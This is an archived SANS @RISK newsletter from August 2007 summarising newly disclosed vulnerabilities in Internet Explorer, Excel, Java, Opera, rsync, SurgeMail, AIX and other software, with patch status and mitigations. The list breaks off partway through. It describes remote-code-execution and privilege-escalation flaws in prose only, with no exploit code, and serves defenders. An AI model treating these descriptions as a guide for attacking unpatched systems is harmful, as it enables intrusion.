Last day to save $500 for SANS San Diego 2013

@RISK: The Consensus Security Vulnerability Alert

Volume: VI, Issue: 34
August 20, 2007

SANS Newsletters Home

This week had more highlighted critical vulnerabilities than any week I can remember. The most critical are in Microsoft products, including Internet Explorer, and in Pegasus Mercury Mail. Another important vulnerability was discovered in the JAVA runtime environment that is found on Solaris, Max OS-X and often on Windows systems. Alan

@RISK is the SANS community's consensus bulletin summarizing the most important vulnerabilities and exploits identified during the past week and providing guidance on appropriate actions to protect your systems (PART I). It also includes a comprehensive list of all new vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week:

    • Category
    • # of Updates & Vulnerabilities
    • Platform Number of Updates and Vulnerabilities
    • - ------------------------ -------------------------------------
    • Windows
    • 7 (#1, #2, #3, #4, #10, #12)
    • Microsoft Office
    • 1 (#7)
    • Other Microsoft Products
    • 7 (#11)
    • Third Party Windows Apps
    • 10 (#5, #6, #13)
    • Mac Os
    • 1
    • Linux
    • 1
    • Aix
    • 3
    • Unix
    • 3
    • Cross Platform
    • 12 (#8, #9, #14, #15, #16)
    • Web Application - Cross Site Scripting
    • 3
    • Web Application - SQL Injection
    • 3
    • Web Application
    • 17
    • Network Device
    • 3 (#17)

********** Sponsored By SANS Network Security and SANS London ***********

Come join us in Las Vegas on September 22-30 for SANS Network Security or in London on 26 Nov to 05 Dec, 2007 (or both) for the biggest SANS training conferences we've ever held in the US and Europe. In Las Vegas, there are more than 40 courses and a big product expo. In London we have 10 classes and the GSSP exam. How good have these event been? Here's what past attendees said: "You learn something new every day...the experience of the instructor and of the students make the difference." (Gabriel Schmitt, Hoffmann-LaRoche) "An extraordinary amount of information covered in a week, backed up with excellent documentation for those long winter nights." (Keith Mellism, Canada Life) "The depth of knowledge is awesome." (Stephen Hall, Barclays) "This course has valuable information that can be implemented immediately in the work place." (Christopher O'Brien, Booz Allen Hamilton) "The quality of teachers, speakers, and even attendees is far superior to any other training event I've attended." (Corinne Cook, Jeppesen) "You will never ever find anything more valuable than SANS superknowledge. Worth the price!!" (Carlos Fragoso, CESCA) Registration information: Las Vegas: http://www.sans.org/ns2007 London: http://www.sans.org/info/14431

*************************************************************************

Table Of Contents
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (www.qualys.com)
Windows
Microsoft Office
Other Microsoft Products
Third Party Windows Apps
Mac Os
Linux
Aix
Unix
Cross Platform
Web Application - Cross Site Scripting
Web Application - SQL Injection
Web Application
Network Device

************************* Sponsored Links *****************************

1) The new Norman SandBox products drastically reduce the time, complexity, and infrastructure required to analyze suspicious files. http://www.sans.org/info/14436

2) SANS OnSite Program can deliver all of our courses to your location and realize significant overall savings at the same time. http://www.sans.org/info/14441

*************************************************************************

PART I Critical Vulnerabilities

Part I for this issue has been compiled by Rob King at TippingPoint, a division of 3Com, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/cva/#process

Widely Deployed Software
  • (3) CRITICAL: Microsoft Internet Explorer Multiple Vulnerabilities (MS07-045)
  • Affected:
    • Microsoft Windows 2000
    • Microsoft Windows XP
    • Microsoft Windows Server 2003
    • Microsoft Windows Vista
    • Microsoft Internet Explorer versions 6 and 7

  • Description: Microsoft Internet Explorer contains multiple vulnerabilities. A failure to properly parse Cascading Style Sheets (CSS), used to provide styling information for web pages, can lead to a memory corruption vulnerability. Style sheets are automatically downloaded by Internet Explorer when visiting a web site that uses them. Additionally, several ActiveX components that were not intended to be instantiated by Internet Explorer can, in fact, be instantiated by Internet Explorer. A malicious web site that instantiates these components can trigger a memory corruption vulnerability. Successfully exploiting any of these vulnerabilities would allow an attacker to execute arbitrary code with the privileges of the current user.

  • Status: Microsoft confirmed, updates available. Users can mitigate the impact of the ActiveX vulnerabilities by disabling the affected controls via Microsoft's "kill bit" mechanism for the following CLSIDs: 8B217746-717D-11CE-AB5B-D41203C10000, 8B217752-717D-11CE-AB5B-D41203C10000, 8B21775E-717D-11CE-AB5B-D41203C10000, and 0DDF3B5C-E692-11D1-AB06-00AA00BDD685.

  • References:
  • (4) CRITICAL: Microsoft Vector Markup Language Remote Code Execution (MS07-050)
  • Affected:
    • Microsoft Windows 2000
    • Microsoft Windows XP
    • Microsoft Windows Server 2003
    • Microsoft Windows Vista
    • Microsoft Internet Explorer version 5 and 6

  • Description: The Vector Markup Language (VML) is an XML-based markup language used to draw vector images. It is supported by Microsoft Internet Explorer to display vectored images on websites. Internet Explorer contains a flaw in its handling of compressed image data referenced by VML documents. A specially crafted web page could exploit this vulnerability and allow an attacker to execute arbitrary code with the privileges of the current user. Note that VML data is rendered automatically by Internet Explorer. A simple proof-of-concept and some technical details are available for this vulnerability.

  • Status: Microsoft confirmed, updates available.

  • References:
  • (6) HIGH: Yahoo! Instant Messenger Video Conferencing Vulnerability
  • Affected:
    • Yahoo! Instant Messenger versions 8.1.0.413 and prior

  • Description: The Yahoo! Instant Messenger application allows for users to videoconference with one another. A user that accepts a videoconference invitation will then accept a JPEG-2000 video stream from a remote user. The Yahoo! Instant Messenger application fails to properly handle invalid JPEG-2000 data. A specially crafted video stream could trigger a buffer overflow vulnerability in the application. Successfully exploiting this vulnerability would allow an attacker to execute arbitrary code with the privileges of the current user. Note that the user must explicitly accept the video conferencing invitation to be vulnerable.

  • Status: Yahoo! has not confirmed, no updates available. Users can mitigate the impact of this vulnerability by blocking TCP port 5100 at the network perimeter, if possible.

  • References:
  • (7) HIGH: Microsoft Excel File Parsing Remote Code Execution (MS07-044)
  • Affected:
    • Microsoft Office 2000
    • Microsoft Office XP
    • Microsoft Office 2003
    • Microsoft Office 2004 for Mac

  • Description: Microsoft Excel contains a flaw in its parsing of Excel spreadsheet files. A specially crafted spreadsheet file could exploit this vulnerability to execute arbitrary code with the privileges of the current user. It is believed that only Excel Workspace files are affected. Note that some technical details are publicly available for this vulnerability. Excel files do not open without first prompting on versions of Microsoft Office later than Microsoft Office 2000.

  • Status: Microsoft confirmed, updates available.

  • References:
  • (8) HIGH: Opera Web Browser JavaScript Remote Code Execution
  • Affected:
    • Opera Web Browser versions prior to 9.23

  • Description: The Opera Web Browser (generally just called Opera) is a popular multiplatform web browser. Opera contains a vulnerability in its handling of JavaScript scripts. A specially crafted web page containing such a script could trigger this vulnerability and execute arbitrary code with the privileges of the current user. Note that some technical details, including details on vulnerability discovery and instructions for exploitation, are publicly available. Opera is commonly deployed on mobile and embedded devices, but is widely used in desktop environments as well.

  • Status: Opera confirmed, updates available.

  • References:
  • (9) HIGH: Sun Java Runtime Environment Font Processing Overflow
  • Affected:
    • Sun Java Runtime Environment versions prior to 1.5.0_10 and 1.4.2_15

  • Description: The Sun Java Runtime Environment contains a flaw in the handling of font files. These files can be included with remotely launched Java applets and applications. A specially crafted font file could exploit this flaw and trigger a buffer overflow. Successfully exploiting this buffer overflow would allow an attacker to execute arbitrary code with the privileges of the current user. Note that Java applets are often loaded automatically in web pages. The Sun Java Runtime Environment is installed by default on Sun Solaris, Apple Mac OS X, and several other operating systems. It is often installed on Microsoft Windows as well.

  • Status: Sun confirmed, updates available.

  • References:
  • (10) MODERATE: Microsoft GDI Remote Code Execution (MS07-046)
  • Affected:
    • Microsoft Windows 2000
    • Microsoft Windows XP
    • Microsoft Windows Server 2003

  • Description: The Microsoft Graphics Device Interface (GDI) allows applications to produce graphics and text on various devices. The GDI fails to properly handle the rendering of certain Windows Metafile image files. A specially crafted image file could trigger this vulnerability and leverage this vulnerability to execute arbitrary code with the privileges of the current user. Note that Windows Metafile image files are not normally rendered by Internet Explorer; therefore malicious web sites cannot normally exploit this vulnerability. Other avenues of exploitation may include email attachments and downloaded files. Some technical details are available for this vulnerability.

  • Status: Microsoft confirmed, updates available.

  • References:
  • (11) MODERATE: Microsoft Windows Media Player Multiple Vulnerabilities (MS07-047)
  • Affected:
    • Microsoft Windows 2000
    • Microsoft Windows XP
    • Microsoft Windows Server 2003
    • Microsoft Windows Vista

  • Description: Microsoft Windows Media Player is Microsoft's streaming media player for Microsoft Windows. This player supports "skinning" - the ability to alter the appearance and behavior of the player's user interface according to "skin" files. Windows Media Player contains several vulnerabilities in the parsing of skin files. A specially crafted skin file could exploit one of these vulnerabilities to execute arbitrary code with the privileges of the current user. Note that, in most configurations, users are prompted before downloading a skin file. To exploit this vulnerability, an attacker would have to convince a user to apply the skin once it had been downloaded.

  • Status: Microsoft confirmed, updates available.

  • References:
  • (13) MODERATE: Lenovo Automated Solutions ActiveX Control Multiple Vulnerabilities
  • Affected:
    • Lenovo Automated Solutions

  • Description: The Lenovo Automated Solutions system is installed on Lenovo and IBM desktop systems and is used by support personnel to provide technical support. This system includes several ActiveX controls that contain various vulnerabilities. These controls fail to properly validate input to methods they export; these methods allow the execution of arbitrary commands, the downloading of files, and access to system configuration. A malicious web page that instantiated one of these controls could exploit these vulnerabilities.

  • Status: Lenovo confirmed, updates available. Users can mitigate the impact of these vulnerabilities by disabling the vulnerable controls via Microsoft's "kill bit" mechanism for the following CLSIDs: E598AC61-4C6F-4F4D-877F-FAC49CA91FA3, E598AC61-4C6F-4F4D-877F-FAC49CA91FA3, E598AC61-4C6F-4F4D-877F-FAC49CA91FA3. Note that Microsoft Security Update MS07-045 also disables these controls.

  • References:
  • (14) MODERATE: Rsync Multiple Buffer Overflows
  • Affected:
    • Rsync versions 2.6.9 and prior

  • Description: Rsync is a file synchronization utility used and installed by default on a variety of Unix, Unix-like, and Linux systems (including Apple Mac OS X). This utility can be run in server mode, allowing remote clients to connect and synchronize data. This utility contains two buffer overflow vulnerabilities in its handling of overlong filenames. An attacker could exploit these buffer overflows to execute arbitrary code with the privileges of the vulnerable process. Note that full technical details are available for this vulnerability, both in the advisory and through source code analysis.

  • Status: Rsync has not confirmed, no updates available.

  • References:
Other Software
  • (15) MODERATE: SurgeMail "SEARCH" Buffer Overflow
  • Affected:
    • SurgeMail IMAP Servers

  • Description: SurgeMail is a popular mail and groupware suite for several operating systems. Its included IMAP server fails to properly handle overlong arguments to the IMAP "SEARCH" command. A specially crafted SEARCH request could exploit this vulnerability to execute arbitrary commands with the privileges of the vulnerable process. Note that attackers would require authentication to successfully exploit this vulnerability.

  • Status: SurgeMail has not confirmed, no updates available.

  • References:
  • (16) MODERATE: Fedora Commons Authentication Bypass
  • Affected:
    • Fedora Commons versions prior to 2.2.1

  • Description: Fedora Commons is an open source project that provides tools for the management of digital media and content. A logic error in the handling of authentication requests when users authenticate via the Lightweight Directory Access Protocol (LDAP) could lead to a condition in which a user is successfully authenticated with invalid credentials. Note that it is believed that this only occurs during authentication against LDAP servers; other authentication methods are unaffected. Full technical details for this vulnerability are available in the bug report and via source code analysis.

  • Status: Fedora Commons confirmed, updates available.

  • References:
Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 34, 2007

This list is compiled by Qualys ( www.qualys.com ) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 5397 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.

  • 07.34.1 - CVE: CVE-2007-2223
  • Platform: Windows
  • Title: Microsoft XML Core Services Remote Code Execution
  • Description: Microsoft XML Core Services (MSXML) is a software component that allows multiple programming languages to support XML-based communication. The application is exposed to a remote code execution issue because the software fails to properly validate memory requests.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS07-042.mspx
  • 07.34.2 - CVE: CVE-2007-3034
  • Platform: Windows
  • Title: Microsoft Windows GDI Image File Remote Code Execution
  • Description: Microsoft Windows GDI (Graphics Device Interface) is an abstraction layer allowing applications to interact indirectly with displays and printers. The application is exposed to a remote code execution issue because it fails to properly bounds check user-supplied image data.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS07-046.mspx
  • 07.34.3 - CVE: Not Available
  • Platform: Windows
  • Title: Microsoft Windows Vista Contacts Gadget Remote Code Execution
  • Description: Windows Vista gadgets are mini-applications that provide information or utilities to users. The Contacts gadget is exposed to a remote code execution issue because it fails to adequately sanitize user-supplied HTML data. This issue occurs when a user adds or imports a malicious contact file to the affected gadget.
  • Ref: http://www.microsoft.com/technet/security/bulletin/MS07-048.mspx
  • 07.34.4 - CVE: CVE-2007-3891
  • Platform: Windows
  • Title: Microsoft Windows Vista Weather Gadget Remote Code Execution
  • Description: Windows Vista Gadgets are mini-applications that provide information or utilities to users. The Weather gadget is exposed to a remote code execution issue because it fails to adequately validate certain HTML attributes.
  • Ref: http://www.microsoft.com/technet/security/bulletin/MS07-048.mspx
  • 07.34.5 - CVE: Not Available
  • Platform: Windows
  • Title: Microsoft OLE Automation Remote Code Execution
  • Description: Microsoft's Object linking and embedding (OLE) Automation is a Windows protocol that permits applications to share data or to control other applications. OLE Automation is exposed to a remote code execution issue because it fails to handle specially crafted script requests.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS07-043.mspx
  • 07.34.6 - CVE: CVE-2007-3033
  • Platform: Windows
  • Title: Microsoft Windows Vista Feed Headlines Gadget Remote Code Execution
  • Description: Windows Vista Feed Headlines gadget is an RSS-feed application. Gadgets are mini-applications in Windows Vista that provide information or utilities to users. The gadget is exposed to a remote code execution issue because it fails to adequately sanitize user-supplied HTML data.
  • Ref: http://www.microsoft.com/technet/security/bulletin/MS07-048.mspx
  • 07.34.7 - CVE: Not Available
  • Platform: Windows
  • Title: Microsoft DirectX Media SDK DXTLIPI.DLL ActiveX Control Buffer Overflow
  • Description: Microsoft DirectX Media SDK is a set of multimedia-related APIs for Microsoft Windows. Microsoft DirectX Media SDK "DXTLIPI.DLL" ActiveX control is exposed to a buffer overflow issue because it fails to perform adequate boundary checks on user-supplied data. Microsoft DirectX Media SDK 6.0 with DXTLIPI.DLL version 6.0.2.827 is affected.
  • Ref: http://support.microsoft.com/kb/240797
  • 07.34.8 - CVE: CVE-2007-3890
  • Platform: Microsoft Office
  • Title: Microsoft Excel Worksheet Index Value Remote Code Execution
  • Description: Microsoft Excel is a spreadsheet application that is part of the Microsoft Office suite. The application is exposed to a remote code execution issue because it fails to perform sufficient validation when denoting the index value of an Excel worksheet.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS07-044.mspx
  • 07.34.9 - CVE: CVE-2007-3035
  • Platform: Other Microsoft Products
  • Title: Microsoft Windows Media Player Remote Skin Decompression Code Execution
  • Description: Microsoft Windows Media Player is a multimedia application available for the Microsoft Windows operating system. The application is exposed to a remote code execution issue when handling specially crafted compressed skin files.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS07-047.mspx
  • 07.34.10 - CVE: CVE-2007-1749
  • Platform: Other Microsoft Products
  • Title: Microsoft Internet Explorer Vector Markup Language VGX.DLL Remote Buffer Overflow
  • Description: VML (Vector Markup Language) is an implementation of XML (Extensible Markup Language) used for rendering vector graphics. The application is exposed to a buffer overflow issue because it fails to perform adequate boundary checks on user-supplied data.
  • Ref: http://www.microsoft.com/technet/security/bulletin/MS07-050.mspx
  • 07.34.11 - CVE: CVE-2007-3037
  • Platform: Other Microsoft Products
  • Title: Microsoft Windows Media Player Remote Skin Header Code Execution
  • Description: Microsoft Windows Media Player is a multimedia application available for the Microsoft Windows operating system. The application is exposed to a remote code execution issue when handling specially crafted skin files.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS07-047.mspx
  • 07.34.12 - CVE: CVE-2007-0943
  • Platform: Other Microsoft Products
  • Title: Microsoft Internet Explorer CSS Strings Memory Corruption
  • Description: Microsoft Internet Explorer is exposed to a remote code execution issue because it fails to properly handle certain CSS data. This issue stems from a memory corruption flaw when the application attempts to process certain CSS (Cascading Style Sheets) strings while rendering HTML documents. Internet Explorer 5.01 SP4 running on Microsoft Windows 2000 SP4 is affected.
  • Ref: http://www.microsoft.com/technet/security/bulletin/MS07-045.mspx
  • 07.34.13 - CVE: CVE-2007-2216
  • Platform: Other Microsoft Products
  • Title: Microsoft Visual Basic 6 TBLinf32.DLL ActiveX Control Remote Code Execution
  • Description: The Microsoft Visual Basic 6 TypeLib Information Library (TLI) ActiveX control is exposed to a remote code execution issue that has been identified in the Microsoft Visual Basic 6 TypeLib Information Library (TLI) "tblinf32.dll" ActiveX control. It allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer).
  • Ref: http://support.microsoft.com/kb/240797
  • 07.34.14 - CVE: CVE-2007-3041
  • Platform: Other Microsoft Products
  • Title: Microsoft Visual Basic 6 Package and Deployment Wizard ActiveX Control Remote Code Execution
  • Description: The Microsoft Visual Basic 6 Package and Deployment Wizard ActiveX control is exposed to a remote code execution issue. The issue has been identified in the Microsoft Visual Basic 6 Package and Deployment Wizard "pdwizard.ocx" ActiveX control.
  • Ref: http://www.microsoft.com/technet/security/bulletin/MS07-045.mspx
  • 07.34.15 - CVE: CVE-2007-0948
  • Platform: Other Microsoft Products
  • Title: Microsoft Virtual PC and Virtual Server Heap Overflow
  • Description: Microsoft Virtual PC and Virtual Server are virtualization applications for Microsoft Windows and Mac OS X operating systems. The application is exposed to a local heap overflow issue that stems from a problem with the interaction and initialization of certain components that communicate with the host operating system.
  • Ref: http://www.microsoft.com/technet/security/bulletin/MS07-049.mspx
  • 07.34.16 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: EDraw Office Viewer Component ActiveX Control Arbitrary File Overwrite
  • Description: The EDraw Office Viewer Component is an ActiveX control to display and interact with Microsoft Office files such as Word, Excel, PowerPoint, Project, and Visio. The application is exposed to an arbitrary file overwrite issue in the method called "HttpDownloadFile". The EDraw Office Viewer Component version 5.1 is affected.
  • Ref: http://support.microsoft.com/kb/240797
  • 07.34.17 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Yahoo! Messenger KDU_V32M.DLL Remote Denial of Service
  • Description: Yahoo! Messenger is an instant messaging application available for multiple operating platforms. Yahoo! Messenger is exposed to a remote denial of service issue that occurs in the "kdu_v32M.dll" library. Yahoo! Messenger version 8.1.0 is affected.
  • Ref: http://www.securityfocus.com/bid/25330
  • 07.34.18 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Live For Speed Multiple Vulnerabilities
  • Description: Live For Speed is an online racing simulator for Microsoft Windows. It has a number of modes of operation including demo, LAN, S1 (Internet), and S2 (hidden). The application is exposed to multiple issues. Live for Speed Live for Speed Demo versions S1 and S2 are affected.
  • Ref: http://www.securityfocus.com/bid/25327
  • 07.34.19 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Motive Service Activation Manager and Service Manager Remote Code Execution
  • Description: Service Activation Manager is an application that allows users to activate new subscribers. Self Service Manager is an application that allows subscribers to manage their mobile services. Motive Service Activation Manager and Service Manager are exposed to a remote code execution issue that occurs in the ActiveX control.
  • Ref: http://www.microsoft.com/technet/security/bulletin/MS07-045.mspx
  • 07.34.20 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Lenovo Inline Automated Solutions ActiveX Controls Remote Code Execution
  • Description: Lenovo Inline Automated Solutions ActiveX controls are exposed to a remote code execution issue that occurs in the ActiveX controls. Lenovo Inline Automated Solutions versions prior to "acpcontroller.dll" ActiveX control 1.2.8.0 and "acpir.dll" ActiveX control 1.0.0.9 are affected.
  • Ref: http://www.kb.cert.org/vuls/id/426737
  • 07.34.21 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Diskeeper DKService.EXE Remote Information Disclosure
  • Description: Diskeeper is a hard disk drive maintenance and data integrity system available for the Microsoft Windows operating system. The application is exposed to an information disclosure issue because the affected service fails to restrict access to the "MIDL" RPC function. Diskeeper versions 9 Professional and 2007 Pro Premier are affected.
  • Ref: http://www.securityfocus.com/bid/25320
  • 07.34.22 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Qbik WinGate SMTP Service Command Format String
  • Description: Qbik WinGate is an internet gateway and communications server for the Microsoft Windows operating system. The application is exposed to a remote format string issue because it fails to properly sanitize user-supplied input before including it in the format specifier argument of a formatted printing function. Qbik WinGate version 6.2.1 is affected.
  • Ref: http://www.wingate.com/showfaq.php?faqid=2
  • 07.34.23 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Symantec Altiris Deployment Solution Local Privilege Escalation
  • Description: Symantec Altiris Deployment Solution is software for deploying and managing servers, desktops, notebooks, thin clients and handheld devices from a centralized location. It is available for Microsoft Windows. The application is exposed to a local privilege escalation issue that occurs in the "Log File Viewer" of the "Aclient" process.
  • Ref: http://www.symantec.com/avcenter/security/Content/2007.08.13.html
  • 07.34.24 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: AMD ATI ATIDSMXX.SYS Driver Local Privilege Escalation
  • Description: ATI is the graphics hardware/software development division of AMD. The ATI atidsmxx.sys driver is exposed to a local privilege escalation issue because it is a Windows Vista signed driver and can read/write kernel memory. atidsmxx.sys version 3.0.502.0 is affected.
  • Ref: http://blogs.zdnet.com/security/?p=427
  • 07.34.25 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: WinGate SMTP Session Invalid State Remote Denial of Service
  • Description: WinGate is a proxy server application available for Microsoft Windows. The application is exposed to a denial of service issue because it fails to sanitize user-supplied input before including it in the format-specifier argument of the "vsprintf()" function. WinGate versions prior to 6.2.2 are affected.
  • Ref: http://www.securityfocus.com/archive/1/476011
  • 07.34.26 - CVE: Not Available
  • Platform: Mac Os
  • Title: CounterPath X-Lite SIP Soft Phone Malformed Packet Denial of Service
  • Description: CounterPath X-Lite is a SIP Soft Phone for Microsoft Windows and Mac OS X operating systems. The application is exposed to a denial of service issue because the application fails to properly handle malformed data. CounterPath X-Lite SIP Soft Phone version 3.0 is affected.
  • Ref: http://www.securityfocus.com/archive/1/476259
  • 07.34.27 - CVE: Not Available
  • Platform: Linux
  • Title: Fedora Commons LDAP Authentication Bypass
  • Description: Fedora Commons is a freely available platform for managing and storing digital content. The application is exposed to an authentication bypass issue because it fails to properly handle unexpected conditions. Fedora Commons versions 2.2.1 are affected.
  • Ref: http://sourceforge.net/tracker/index.php?func=detail&aid=1731608& group_id=177054&atid=879703
  • 07.34.28 - CVE: Not Available
  • Platform: Aix
  • Title: IBM AIX Configuration Commands Multiple Buffer Overflow Vulnerabilities
  • Description: IBM AIX is a Unix-based operating platform. AIX is exposed to multiple buffer overflow issues because it fails to perform adequate boundary checks on user-supplied input. AIX versions 5.2.0.85 through 5.2.0.105, and 5.3.0.40 through 5.3.0.61 are affected.
  • Ref: http://www.securityfocus.com/bid/25270
  • 07.34.29 - CVE: Not Available
  • Platform: Aix
  • Title: IBM AIX Fileplace Command Buffer Overflow Vulnerabilities
  • Description: IBM AIX is exposed to a buffer overflow issue because it fails to perform adequate boundary checks on user-supplied input. This issue occurs in the "fileplace" command. AIX versions 5.2.0.85 through 5.2.0.105, and 5.3.0.40 through 5.3.0.61 are affected.
  • Ref: http://www.securityfocus.com/bid/25271
  • 07.34.30 - CVE: Not Available
  • Platform: Aix
  • Title: IBM AT Command Local Buffer Overflow
  • Description: AIX is a Unix operating system from IBM. The application is exposed to a local buffer overflow issue because it fails to perform adequate boundary checks on user-supplied input. AIX versions 5.3.0.0 through 5.3.0.60 are affected.
  • Ref: http://www.securityfocus.com/bid/25273
  • 07.34.31 - CVE: CVE-2007-4091
  • Platform: Unix
  • Title: Rsync F_Name Off-By-One Buffer Overflow
  • Description: The rsync utility is used to synchronize files and directory structures across a network. It is commonly used to maintain mirrors of FTP sites, often through anonymous access to the rsync server. It is available for Unix, Linux, and other Unix-like operating systems. The application is exposed to an off-by-one buffer overflow issue due to a failure of the application to properly bounds check user-supplied input. Rsync version 2.6.9 is affected. Ref: http://article.gmane.org/gmane.linux.debian.devel.bugs.general/291908
  • 07.34.32 - CVE: Not Available
  • Platform: Unix
  • Title: Tomboy LD_LIBRARY_PATH Environment Variable Local Privilege Escalation
  • Description: Tomboy is a desktop note-taking application available for Unix, Linux and other Unix-like operating systems. The application is exposed to a local privilege escalation issue that occurs when the "/usr/bin/tomboy" script sets the "LD_LIBRARY_PATH" environment variable incorrectly.
  • Ref: http://bugs.gentoo.org/show_bug.cgi?id=188806
  • 07.34.33 - CVE: Not Available
  • Platform: Unix
  • Title: Universal Ircd Server Multiple Remote Vulnerabilities
  • Description: Universal Ircd (ircu) is a freely available Internet Relay Chat (IRC) server. The application is exposed to multiple remote issues, including denial of service issues and privilege escalation issues.
  • Ref: http://www.securityfocus.com/archive/1/476285
  • 07.34.34 - CVE: Not Available
  • Platform: Cross Platform
  • Title: IBM DB2 Universal Database Multiple Unspecified Vulnerabilities
  • Description: IBM DB2 Universal Database Server is a database server application designed to run on various platforms including Linux, AIX, Solaris, and Microsoft Windows. The application is exposed to carry out a variety of attacks. DB2 versions 9.1 and 8 running on all supported platforms are affected.
  • Ref: http://www-1.ibm.com/support/docview.wss?uid=swg1IY88226
  • 07.34.35 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Symantec Enterprise Firewall Username Enumeration Weakness
  • Description: Symantec Enterprise Firewall is an enterprise level firewall available for Microsoft Windows and Unix operating systems. The application is exposed to a username enumeration weakness. It responds differently when responding to valid and invalid usernames.
  • Ref: http://www.symantec.com/avcenter/security/Content/2007.08.16.html
  • 07.34.36 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Sun Java Runtime Environment Font Parsing Remote Privilege Escalation
  • Description: Sun Java Runtime Environment is an enterprise development platform. The application is exposed to a remote privilege escalation issue that occurs in the font parsing code of the affected application.
  • Ref: http://sunsolve.sun.com/show.do?target=tous
  • 07.34.37 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Cisco VPN Client for Windows Multiple Local Privilege Escalation Vulnerabilities
  • Description: Cisco VPN Client is a freely-available IPsec client application that is used to connect to Cisco VPN servers. It is available for mutilple platforms including Microsoft Windows, Apple Mac OS X, Unix and Linux. Cisco VPN Client for Windows is exposed to multiple local privilege escalation issues. Cisco VPN Client versions prior to 4.8.02.0010 and 5.0.01.0600 for the Microsoft Windows platform are affected.
  • Ref: http://www.securityfocus.com/archive/1/476651
  • 07.34.38 - CVE: CVE-2007-4278
  • Platform: Cross Platform
  • Title: ESRI ArcSDE Server SPrintf Function Stack Buffer Overflow
  • Description: ESRI ArcSDE Server is used to access multi-user geographic databases. The application is exposed to a remote stack-based buffer overflow issue because the application fails to bounds check user-supplied data before copying it into an insufficiently sized buffer. ArcSDE service version 9.2 is affected.
  • Ref: http://www.securityfocus.com/archive/1/476673
  • 07.34.39 - CVE: Not Available
  • Platform: Cross Platform
  • Title: RndLabs Babo Violent 2 Multiple Vulnerabilities
  • Description: Babo Violent 2 is multiplayer game for Microsoft Windows and Linux. The application is exposed to multiple issues. RndLabs Babo Violent version 2 2.08 is affected.
  • Ref: http://www.securityfocus.com/archive/1/476520
  • 07.34.40 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Opera Web Browser Invalid Pointer Remote Code Execution
  • Description: The Opera Web Browser is a web client available for multiple platforms. The application is exposed to a remote code execution issue when parsing malicious JavaScript code. This issue occurs when a virtual function is invoked using an invalid pointer. Opera versions prior to 9.23 are affected.
  • Ref: http://www.opera.com/support/search/view/865/
  • 07.34.41 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Zoidcom Malformed Packet Denial of Service
  • Description: Zoidcom is a network library for developing gaming network protocols. It is available for Microsoft Windows, Linux and Mac OS X. The application is exposed to a denial of service issue when handling malformed packets. Zoidcom versions 0.6.5 and 0.6.7 are affected.
  • Ref: http://www.securityfocus.com/archive/1/476523
  • 07.34.42 - CVE: Not Available
  • Platform: Cross Platform
  • Title: SurgeMail IMAP SEARCH Command Remote Buffer Overflow
  • Description: SurgeMail is a commercial email application for multiple platforms that contains an IMAP server. The application is exposed to a remote buffer overflow issue due to insufficient bounds checking of user-supplied input. SurgeMail version 38k is affected.
  • Ref: http://www.securityfocus.com/bid/25318
  • 07.34.43 - CVE: CVE-2007-3385, CVE-2007-3382
  • Platform: Cross Platform
  • Title: Apache Tomcat Multiple Remote Information Disclosure Vulnerabilities
  • Description: Apache Tomcat is a Java-based web server application for multiple operating systems. The application is exposed to multiple information disclosure issues because it fails to adequately sanitize user-supplied data. Apache Tomcat versions prior to 6.0.14 are affected.
  • Ref: http://www.securityfocus.com/archive/1/476442
  • 07.34.44 - CVE: Not Available
  • Platform: Cross Platform
  • Title: WengoPhone SIP Soft Phone Malformed Packet Denial of Service
  • Description: WengoPhone is a SIP Soft Phone for Microsoft Windows, Linux and Mac OS X operating systems. The application is exposed to a denial of service issue because the application fails to properly handle malformed data. WengoPhone version 2.1 is affected.
  • Ref: http://www.securityfocus.com/archive/1/476270
  • 07.34.45 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Racer Remote Buffer Overflow
  • Description: Racer is a cross-platform racing simulator. The application is exposed to a remote buffer overflow issue because it fails to perform adequate boundary checks on user-supplied input. Racer version 0.5.3 beta 5 is affected.
  • Ref: http://www.securityfocus.com/bid/25297
  • 07.34.46 - CVE: CVE-2007-3386
  • Platform: Web Application - Cross Site Scripting
  • Title: Apache Tomcat Host Manager Servlet Cross-Site Scripting
  • Description: Apache Tomcat is a Java-based web server application for multiple operating systems. The Host Manager Servlet is a host management application that is included with Tomcat. The software is exposed to a cross-site scripting issue because it fails to properly sanitize user-supplied input to the "aliases" parameter of the "/host-manager/html/add" page prior to utilizing it in dynamically-generated pages. Apache Tomcat versions 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 are affected.
  • Ref: http://www.securityfocus.com/archive/1/476448
  • 07.34.47 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Storesprite Next Parameter Multiple Cross-Site Scripting Vulnerabilities
